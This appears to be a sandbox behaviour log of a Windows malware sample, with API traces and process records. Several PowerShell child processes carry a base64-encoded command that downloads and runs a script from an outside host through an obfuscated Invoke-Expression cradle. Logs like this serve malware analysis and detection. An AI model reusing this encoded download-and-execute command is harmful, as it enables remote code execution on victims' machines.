	[0974.306] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0974.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.350] SetConsoleCtrlHandler (HandlerRoutine=0x2bb68dc, Add=1) returned 1
	[0974.369] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0974.370] CoCreateGuid (in: pguid=0x1ed990 | out: pguid=0x1ed990*(Data1=0x24ba4f98, Data2=0x700f, Data3=0x481c, Data4=([0]=0xae, [1]=0xe0, [2]=0x5e, [3]=0xcb, [4]=0x1a, [5]=0xef, [6]=0xe4, [7]=0x7d))) returned 0x0
	[0974.371] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.371] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.375] WinSqmIsOptedIn () returned 0x0
	[0974.375] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.375] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.376] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.376] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.377] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.377] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.377] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.378] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.378] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.378] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.379] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.379] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.380] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.380] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.380] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.381] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.383] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.383] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.388] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.388] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.389] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.389] CoTaskMemFree (pv=0x2dd0f0) 
	[0974.389] CoTaskMemAlloc (cb=0x104) returned 0x2dd0f0
	[0974.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2dd0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.389] CoTaskMemFree (pv=0x2dd0f0) 

Thread:
	id = 977
	os_tid = 0x1a10


Thread:
	id = 1005
	os_tid = 0x1ab4


Thread:
	id = 1286
	os_tid = 0x1d10


Thread:
	id = 1288
	os_tid = 0x1d20


Thread:
	id = 1331
	os_tid = 0x1e1c


Thread:
	id = 1409
	os_tid = 0x1ff4


Thread:
	id = 1585
	os_tid = 0x2140


Thread:
	id = 1586
	os_tid = 0x2144

	[0829.222] CoGetContextToken (in: pToken=0x1b69f070 | out: pToken=0x1b69f070) returned 0x0
	[0829.222] CObjectContext::QueryInterface () returned 0x0
	[0829.222] CObjectContext::GetCurrentThreadType () returned 0x0
	[0829.222] Release () returned 0x0
	[0829.222] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2150
	os_tid = 0x2374


Process:
	id = "171"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4400a000"
	os_pid = "0x18c4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 927
	os_tid = 0x18c8

	[0519.829] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1041
	os_tid = 0x1bb8


Thread:
	id = 1047
	os_tid = 0x1be0


Thread:
	id = 1860
	os_tid = 0x24a4


Thread:
	id = 1865
	os_tid = 0x24b8


Thread:
	id = 1880
	os_tid = 0x2504


Thread:
	id = 2010
	os_tid = 0x2758


Process:
	id = "172"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x43918000"
	os_pid = "0x18e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 930
	os_tid = 0x18ec

	[0517.830] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 976
	os_tid = 0x1a0c


Thread:
	id = 1004
	os_tid = 0x1ab0


Thread:
	id = 1541
	os_tid = 0x2064


Thread:
	id = 1549
	os_tid = 0x2084


Thread:
	id = 1603
	os_tid = 0x2184


Thread:
	id = 1705
	os_tid = 0x23e0


Process:
	id = "173"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3edd4000"
	os_pid = "0x1938"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "43"
	os_parent_pid = "0xcfc"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 943
	os_tid = 0x193c

	[0516.164] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 962
	os_tid = 0x19c8


Thread:
	id = 989
	os_tid = 0x1a54


Thread:
	id = 1515
	os_tid = 0x100c


Thread:
	id = 1519
	os_tid = 0x1dd4


Thread:
	id = 1555
	os_tid = 0x209c


Thread:
	id = 1680
	os_tid = 0x2358


Process:
	id = "174"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x43125000"
	os_pid = "0x1940"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 944
	os_tid = 0x1944

	[0519.973] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1029
	os_tid = 0x1b5c


Thread:
	id = 1032
	os_tid = 0x1b74


Thread:
	id = 1750
	os_tid = 0x17c4


Thread:
	id = 1757
	os_tid = 0x22fc


Thread:
	id = 1780
	os_tid = 0xa98


Thread:
	id = 1885
	os_tid = 0x2524


Process:
	id = "175"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x36e62000"
	os_pid = "0x196c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0xab0"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 950
	os_tid = 0x1970

	[0515.810] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0829.801] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0836.776] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.777] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.777] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0836.777] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0877.823] sprintf_s (in: _DstBuf=0x24f4b8, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0883.979] GetVersionExW (in: lpVersionInformation=0x24dfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0883.982] GetVersionExW (in: lpVersionInformation=0x24dfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0883.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0883.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0883.996] GetVersionExW (in: lpVersionInformation=0x24dd30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dd30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0883.997] SetErrorMode (uMode=0x1) returned 0x1
	[0883.998] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24de90 | out: lpFileInformation=0x24de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0883.999] SetErrorMode (uMode=0x1) returned 0x1
	[0884.002] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24e100 | out: lpdwHandle=0x24e100) returned 0x94c
	[0884.004] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b972a0 | out: lpData=0x2b972a0) returned 1
	[0884.007] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24e078, puLen=0x24e070 | out: lplpBuffer=0x24e078*=0x2b9733c, puLen=0x24e070) returned 1
	[0884.804] lstrlenW (lpString="䅁") returned 1
	[0884.813] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b97418, puLen=0x24dfe0) returned 1
	[0884.814] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0884.816] CoTaskMemAlloc (cb=0x2e) returned 0x4404e0
	[0884.816] lstrcpyW (in: lpString1=0x4404e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0884.817] CoTaskMemFree (pv=0x4404e0) 
	[0884.818] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b9746c, puLen=0x24dfe0) returned 1
	[0884.818] lstrlenW (lpString="System.Management.Automation") returned 28
	[0884.818] CoTaskMemAlloc (cb=0x3c) returned 0x3feea0
	[0884.818] lstrcpyW (in: lpString1=0x3feea0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0884.818] CoTaskMemFree (pv=0x3feea0) 
	[0884.818] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b974c8, puLen=0x24dfe0) returned 1
	[0884.818] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0884.818] CoTaskMemAlloc (cb=0x20) returned 0x446f20
	[0884.818] lstrcpyW (in: lpString1=0x446f20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0884.818] CoTaskMemFree (pv=0x446f20) 
	[0884.818] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b97508, puLen=0x24dfe0) returned 1
	[0884.818] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0884.818] CoTaskMemAlloc (cb=0x44) returned 0x3feea0
	[0884.818] lstrcpyW (in: lpString1=0x3feea0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0884.818] CoTaskMemFree (pv=0x3feea0) 
	[0884.818] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b97570, puLen=0x24dfe0) returned 1
	[0884.818] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0884.818] CoTaskMemAlloc (cb=0x76) returned 0x3dd3a0
	[0884.818] lstrcpyW (in: lpString1=0x3dd3a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0884.819] CoTaskMemFree (pv=0x3dd3a0) 
	[0884.819] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b9760c, puLen=0x24dfe0) returned 1
	[0884.819] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0884.819] CoTaskMemAlloc (cb=0x44) returned 0x3feea0
	[0884.819] lstrcpyW (in: lpString1=0x3feea0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0884.819] CoTaskMemFree (pv=0x3feea0) 
	[0884.819] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b97670, puLen=0x24dfe0) returned 1
	[0884.819] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0884.819] CoTaskMemAlloc (cb=0x58) returned 0x394fc0
	[0884.819] lstrcpyW (in: lpString1=0x394fc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0884.819] CoTaskMemFree (pv=0x394fc0) 
	[0884.819] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b976ec, puLen=0x24dfe0) returned 1
	[0884.819] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0884.819] CoTaskMemAlloc (cb=0x20) returned 0x446f20
	[0884.819] lstrcpyW (in: lpString1=0x446f20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0884.819] CoTaskMemFree (pv=0x446f20) 
	[0884.819] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x2b97394, puLen=0x24dfe0) returned 1
	[0884.819] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0884.820] CoTaskMemAlloc (cb=0x66) returned 0x3bbb70
	[0884.820] lstrcpyW (in: lpString1=0x3bbb70, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0884.820] CoTaskMemFree (pv=0x3bbb70) 
	[0884.820] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x0, puLen=0x24dfe0) returned 0
	[0884.820] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x0, puLen=0x24dfe0) returned 0
	[0884.820] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dfe8, puLen=0x24dfe0 | out: lplpBuffer=0x24dfe8*=0x0, puLen=0x24dfe0) returned 0
